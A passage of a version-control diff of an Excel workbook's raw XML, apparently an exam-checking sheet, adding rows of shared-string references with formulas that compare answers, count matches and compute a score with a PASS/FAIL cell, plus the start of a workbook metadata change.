+        <v>94</v>
+      </c>
+      <c r="B95" t="s">
+        <v>130</v>
+      </c>
+      <c r="D95" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="96" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A96" s="1">
+        <v>95</v>
+      </c>
+      <c r="B96" t="s">
+        <v>228</v>
+      </c>
+      <c r="D96" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="97" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A97" s="1">
+        <v>96</v>
+      </c>
+      <c r="B97" t="s">
+        <v>221</v>
+      </c>
+      <c r="D97" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="98" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A98" s="1">
+        <v>97</v>
+      </c>
+      <c r="B98" t="s">
+        <v>206</v>
+      </c>
+      <c r="D98" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="99" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A99" s="1">
+        <v>98</v>
+      </c>
+      <c r="B99" t="s">
+        <v>192</v>
+      </c>
+      <c r="D99" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="100" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A100" s="1">
+        <v>99</v>
+      </c>
+      <c r="B100" t="s">
+        <v>496</v>
+      </c>
+      <c r="D100" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="101" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A101" s="1">
+        <v>100</v>
+      </c>
+      <c r="B101" t="s">
+        <v>216</v>
+      </c>
+      <c r="D101" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="102" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A102" s="1">
+        <v>101</v>
+      </c>
+      <c r="B102" t="s">
+        <v>193</v>
+      </c>
+      <c r="D102" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="103" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A103" s="1">
+        <v>102</v>
+      </c>
+      <c r="B103" t="s">
+        <v>169</v>
+      </c>
+      <c r="D103" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="104" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A104" s="1">
+        <v>103</v>
+      </c>
+      <c r="B104" t="s">
+        <v>176</v>
+      </c>
+      <c r="D104" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="105" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A105" s="1">
+        <v>104</v>
+      </c>
+      <c r="B105" t="s">
+        <v>158</v>
+      </c>
+      <c r="D105" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="106" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A106" s="1">
+        <v>105</v>
+      </c>
+      <c r="B106" t="s">
+        <v>222</v>
+      </c>
+      <c r="D106" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="107" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A107" s="1">
+        <v>106</v>
+      </c>
+      <c r="B107" t="s">
+        <v>497</v>
+      </c>
+      <c r="D107" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="108" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A108" s="1">
+        <v>107</v>
+      </c>
+      <c r="B108" t="s">
+        <v>153</v>
+      </c>
+      <c r="D108" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="109" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A109" s="1">
+        <v>108</v>
+      </c>
+      <c r="B109" t="s">
+        <v>189</v>
+      </c>
+      <c r="D109" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="110" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A110" s="1">
+        <v>109</v>
+      </c>
+      <c r="B110" t="s">
+        <v>498</v>
+      </c>
+      <c r="D110" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="111" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A111" s="1">
+        <v>110</v>
+      </c>
+      <c r="B111" t="s">
+        <v>499</v>
+      </c>
+      <c r="D111" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="112" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A112" s="1">
+        <v>111</v>
+      </c>
+      <c r="B112" t="s">
+        <v>181</v>
+      </c>
+      <c r="D112" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="113" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A113" s="1">
+        <v>112</v>
+      </c>
+      <c r="B113" t="s">
+        <v>500</v>
+      </c>
+      <c r="D113" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="114" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A114" s="1">
+        <v>113</v>
+      </c>
+      <c r="B114" t="s">
+        <v>177</v>
+      </c>
+      <c r="D114" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="115" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A115" s="1">
+        <v>114</v>
+      </c>
+      <c r="B115" t="s">
+        <v>144</v>
+      </c>
+      <c r="D115" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="116" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A116" s="1">
+        <v>115</v>
+      </c>
+      <c r="B116" t="s">
+        <v>501</v>
+      </c>
+      <c r="D116" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="117" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A117" s="1">
+        <v>116</v>
+      </c>
+      <c r="B117" t="s">
+        <v>167</v>
+      </c>
+      <c r="D117" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="118" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A118" s="1">
+        <v>117</v>
+      </c>
+      <c r="B118" t="s">
+        <v>210</v>
+      </c>
+      <c r="D118" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="119" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A119" s="1">
+        <v>118</v>
+      </c>
+      <c r="B119" t="s">
+        <v>390</v>
+      </c>
+      <c r="D119" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="120" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A120" s="1">
+        <v>119</v>
+      </c>
+      <c r="B120" t="s">
+        <v>502</v>
+      </c>
+      <c r="D120" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="121" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A121" s="1">
+        <v>120</v>
+      </c>
+      <c r="B121" t="s">
+        <v>127</v>
+      </c>
+      <c r="D121" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="122" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A122" s="1">
+        <v>121</v>
+      </c>
+      <c r="B122" t="s">
+        <v>171</v>
+      </c>
+      <c r="D122" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="123" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A123" s="1">
+        <v>122</v>
+      </c>
+      <c r="B123" t="s">
+        <v>395</v>
+      </c>
+      <c r="D123" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="124" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A124" s="1">
+        <v>123</v>
+      </c>
+      <c r="B124" t="s">
+        <v>226</v>
+      </c>
+      <c r="D124" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="125" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A125" s="1">
+        <v>124</v>
+      </c>
+      <c r="B125" t="s">
+        <v>195</v>
+      </c>
+      <c r="D125" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="126" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A126" s="1">
+        <v>125</v>
+      </c>
+      <c r="B126" t="s">
+        <v>499</v>
+      </c>
+      <c r="D126" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="127" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A127" s="1">
+        <v>126</v>
+      </c>
+      <c r="B127" t="s">
+        <v>244</v>
+      </c>
+      <c r="D127" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="128" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A128" s="1">
+        <v>127</v>
+      </c>
+      <c r="B128" t="s">
+        <v>184</v>
+      </c>
+      <c r="D128" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="129" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A129" s="1">
+        <v>128</v>
+      </c>
+      <c r="B129" t="s">
+        <v>241</v>
+      </c>
+      <c r="D129" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="130" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A130" s="1">
+        <v>129</v>
+      </c>
+      <c r="B130" t="s">
+        <v>127</v>
+      </c>
+      <c r="D130" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="131" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A131" s="1">
+        <v>130</v>
+      </c>
+      <c r="B131" t="s">
+        <v>236</v>
+      </c>
+      <c r="D131" t="b">
+        <f t="shared" ref="D131:D192" si="2">IF(B131=C131,TRUE,FALSE)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="132" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A132" s="1">
+        <v>131</v>
+      </c>
+      <c r="B132" t="s">
+        <v>133</v>
+      </c>
+      <c r="D132" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="133" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A133" s="1">
+        <v>132</v>
+      </c>
+      <c r="B133" t="s">
+        <v>127</v>
+      </c>
+      <c r="D133" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="134" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A134" s="1">
+        <v>133</v>
+      </c>
+      <c r="B134" t="s">
+        <v>186</v>
+      </c>
+      <c r="D134" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="135" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A135" s="1">
+        <v>134</v>
+      </c>
+      <c r="B135" t="s">
+        <v>133</v>
+      </c>
+      <c r="D135" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="136" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A136" s="1">
+        <v>135</v>
+      </c>
+      <c r="B136" t="s">
+        <v>210</v>
+      </c>
+      <c r="D136" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="137" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A137" s="1">
+        <v>136</v>
+      </c>
+      <c r="B137" t="s">
+        <v>226</v>
+      </c>
+      <c r="D137" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="138" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A138" s="1">
+        <v>137</v>
+      </c>
+      <c r="B138" t="s">
+        <v>468</v>
+      </c>
+      <c r="D138" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="139" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A139" s="1">
+        <v>138</v>
+      </c>
+      <c r="B139" t="s">
+        <v>189</v>
+      </c>
+      <c r="D139" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="140" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A140" s="1">
+        <v>139</v>
+      </c>
+      <c r="B140" t="s">
+        <v>479</v>
+      </c>
+      <c r="D140" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="141" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A141" s="1">
+        <v>140</v>
+      </c>
+      <c r="B141" t="s">
+        <v>229</v>
+      </c>
+      <c r="D141" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="142" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A142" s="1">
+        <v>141</v>
+      </c>
+      <c r="B142" t="s">
+        <v>243</v>
+      </c>
+      <c r="D142" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="143" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A143" s="1">
+        <v>142</v>
+      </c>
+      <c r="B143" t="s">
+        <v>206</v>
+      </c>
+      <c r="D143" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="144" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A144" s="1">
+        <v>143</v>
+      </c>
+      <c r="B144" t="s">
+        <v>204</v>
+      </c>
+      <c r="D144" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="145" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A145" s="1">
+        <v>144</v>
+      </c>
+      <c r="B145" t="s">
+        <v>158</v>
+      </c>
+      <c r="D145" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="146" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A146" s="1">
+        <v>145</v>
+      </c>
+      <c r="B146" t="s">
+        <v>224</v>
+      </c>
+      <c r="D146" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="147" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A147" s="1">
+        <v>146</v>
+      </c>
+      <c r="B147" t="s">
+        <v>487</v>
+      </c>
+      <c r="D147" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="148" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A148" s="1">
+        <v>147</v>
+      </c>
+      <c r="B148" t="s">
+        <v>390</v>
+      </c>
+      <c r="D148" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="149" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A149" s="1">
+        <v>148</v>
+      </c>
+      <c r="B149" t="s">
+        <v>144</v>
+      </c>
+      <c r="D149" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="150" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A150" s="1">
+        <v>149</v>
+      </c>
+      <c r="B150" t="s">
+        <v>222</v>
+      </c>
+      <c r="D150" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="151" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A151" s="1">
+        <v>150</v>
+      </c>
+      <c r="B151" t="s">
+        <v>149</v>
+      </c>
+      <c r="D151" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="152" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A152" s="1">
+        <v>151</v>
+      </c>
+      <c r="B152" t="s">
+        <v>190</v>
+      </c>
+      <c r="D152" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="153" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A153" s="1">
+        <v>152</v>
+      </c>
+      <c r="B153" t="s">
+        <v>465</v>
+      </c>
+      <c r="D153" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="154" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A154" s="1">
+        <v>153</v>
+      </c>
+      <c r="B154" t="s">
+        <v>176</v>
+      </c>
+      <c r="D154" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="155" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A155" s="1">
+        <v>154</v>
+      </c>
+      <c r="B155" t="s">
+        <v>162</v>
+      </c>
+      <c r="D155" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="156" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A156" s="1">
+        <v>155</v>
+      </c>
+      <c r="B156" t="s">
+        <v>157</v>
+      </c>
+      <c r="D156" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="157" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A157" s="1">
+        <v>156</v>
+      </c>
+      <c r="B157" t="s">
+        <v>236</v>
+      </c>
+      <c r="D157" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="158" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A158" s="1">
+        <v>157</v>
+      </c>
+      <c r="B158" t="s">
+        <v>231</v>
+      </c>
+      <c r="D158" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="159" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A159" s="1">
+        <v>158</v>
+      </c>
+      <c r="B159" t="s">
+        <v>501</v>
+      </c>
+      <c r="D159" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="160" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A160" s="1">
+        <v>159</v>
+      </c>
+      <c r="B160" t="s">
+        <v>234</v>
+      </c>
+      <c r="D160" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="161" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A161" s="1">
+        <v>160</v>
+      </c>
+      <c r="B161" t="s">
+        <v>168</v>
+      </c>
+      <c r="D161" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="162" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A162" s="1">
+        <v>161</v>
+      </c>
+      <c r="B162" t="s">
+        <v>492</v>
+      </c>
+      <c r="D162" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="163" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A163" s="1">
+        <v>162</v>
+      </c>
+      <c r="B163" t="s">
+        <v>494</v>
+      </c>
+      <c r="D163" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="164" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A164" s="1">
+        <v>163</v>
+      </c>
+      <c r="B164" t="s">
+        <v>181</v>
+      </c>
+      <c r="D164" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="165" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A165" s="1">
+        <v>164</v>
+      </c>
+      <c r="B165" t="s">
+        <v>477</v>
+      </c>
+      <c r="D165" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="166" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A166" s="1">
+        <v>165</v>
+      </c>
+      <c r="B166" t="s">
+        <v>488</v>
+      </c>
+      <c r="D166" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="167" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A167" s="1">
+        <v>166</v>
+      </c>
+      <c r="B167" t="s">
+        <v>472</v>
+      </c>
+      <c r="D167" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="168" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A168" s="1">
+        <v>167</v>
+      </c>
+      <c r="B168" t="s">
+        <v>206</v>
+      </c>
+      <c r="D168" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="169" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A169" s="1">
+        <v>168</v>
+      </c>
+      <c r="B169" t="s">
+        <v>397</v>
+      </c>
+      <c r="D169" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="170" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A170" s="1">
+        <v>169</v>
+      </c>
+      <c r="B170" t="s">
+        <v>132</v>
+      </c>
+      <c r="D170" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="171" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A171" s="1">
+        <v>170</v>
+      </c>
+      <c r="B171" t="s">
+        <v>467</v>
+      </c>
+      <c r="D171" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="172" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A172" s="1">
+        <v>171</v>
+      </c>
+      <c r="B172" t="s">
+        <v>174</v>
+      </c>
+      <c r="D172" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="173" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A173" s="1">
+        <v>172</v>
+      </c>
+      <c r="B173" t="s">
+        <v>133</v>
+      </c>
+      <c r="D173" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="174" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A174" s="1">
+        <v>173</v>
+      </c>
+      <c r="B174" t="s">
+        <v>154</v>
+      </c>
+      <c r="D174" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="175" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A175" s="1">
+        <v>174</v>
+      </c>
+      <c r="B175" t="s">
+        <v>161</v>
+      </c>
+      <c r="D175" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="176" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A176" s="1">
+        <v>175</v>
+      </c>
+      <c r="B176" t="s">
+        <v>198</v>
+      </c>
+      <c r="D176" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="177" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A177" s="1">
+        <v>176</v>
+      </c>
+      <c r="B177" t="s">
+        <v>215</v>
+      </c>
+      <c r="D177" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="178" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A178" s="1">
+        <v>177</v>
+      </c>
+      <c r="B178" t="s">
+        <v>498</v>
+      </c>
+      <c r="D178" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="179" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A179" s="1">
+        <v>178</v>
+      </c>
+      <c r="B179" t="s">
+        <v>469</v>
+      </c>
+      <c r="D179" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="180" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A180" s="1">
+        <v>179</v>
+      </c>
+      <c r="B180" t="s">
+        <v>169</v>
+      </c>
+      <c r="D180" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="181" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A181" s="1">
+        <v>180</v>
+      </c>
+      <c r="B181" t="s">
+        <v>226</v>
+      </c>
+      <c r="D181" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="182" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A182" s="1">
+        <v>181</v>
+      </c>
+      <c r="B182" t="s">
+        <v>172</v>
+      </c>
+      <c r="D182" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="183" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A183" s="1">
+        <v>182</v>
+      </c>
+      <c r="B183" t="s">
+        <v>184</v>
+      </c>
+      <c r="D183" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="184" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A184" s="1">
+        <v>183</v>
+      </c>
+      <c r="B184" t="s">
+        <v>153</v>
+      </c>
+      <c r="D184" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="185" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A185" s="1">
+        <v>184</v>
+      </c>
+      <c r="B185" t="s">
+        <v>474</v>
+      </c>
+      <c r="D185" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="186" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A186" s="1">
+        <v>185</v>
+      </c>
+      <c r="B186" t="s">
+        <v>474</v>
+      </c>
+      <c r="D186" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="187" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A187" s="1">
+        <v>186</v>
+      </c>
+      <c r="B187" t="s">
+        <v>192</v>
+      </c>
+      <c r="D187" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="188" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A188" s="1">
+        <v>187</v>
+      </c>
+      <c r="B188" t="s">
+        <v>210</v>
+      </c>
+      <c r="D188" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="189" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A189" s="1">
+        <v>188</v>
+      </c>
+      <c r="B189" t="s">
+        <v>476</v>
+      </c>
+      <c r="D189" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="190" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A190" s="1">
+        <v>189</v>
+      </c>
+      <c r="B190" t="s">
+        <v>170</v>
+      </c>
+      <c r="D190" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="191" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A191" s="1">
+        <v>190</v>
+      </c>
+      <c r="B191" t="s">
+        <v>158</v>
+      </c>
+      <c r="D191" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="192" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A192" s="1">
+        <v>191</v>
+      </c>
+      <c r="B192" t="s">
+        <v>464</v>
+      </c>
+      <c r="D192" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="194" spans="4:10" x14ac:dyDescent="0.25">
+      <c r="D194">
+        <f>COUNTIF(D94:D193,TRUE)</f>
+        <v>0</v>
+      </c>
+      <c r="F194" t="s">
+        <v>456</v>
+      </c>
+      <c r="G194">
+        <f>SUM(D192)</f>
+        <v>0</v>
+      </c>
+      <c r="I194" t="s">
+        <v>458</v>
+      </c>
+      <c r="J194" t="str">
+        <f>IF(G104&gt;=160,"PASS","FAIL")</f>
+        <v>FAIL</v>
+      </c>
+    </row>
+    <row r="195" spans="4:10" x14ac:dyDescent="0.25">
+      <c r="F195" t="s">
+        <v>457</v>
+      </c>
+      <c r="G195">
+        <f>SUM(G194/191*100)</f>
+        <v>0</v>
+      </c>
+    </row>
+  </sheetData>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+</worksheet>
 </file>
--- a/Exam excel.xlsx
+++ b/Exam excel.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\stratumhr\Downloads\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{04AA0D38-24D2-48E7-A7C4-07E203ACEA1F}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{1F63822D-BDC9-4494-8C2D-0D32CF66C3E6}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" activeTab="4" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
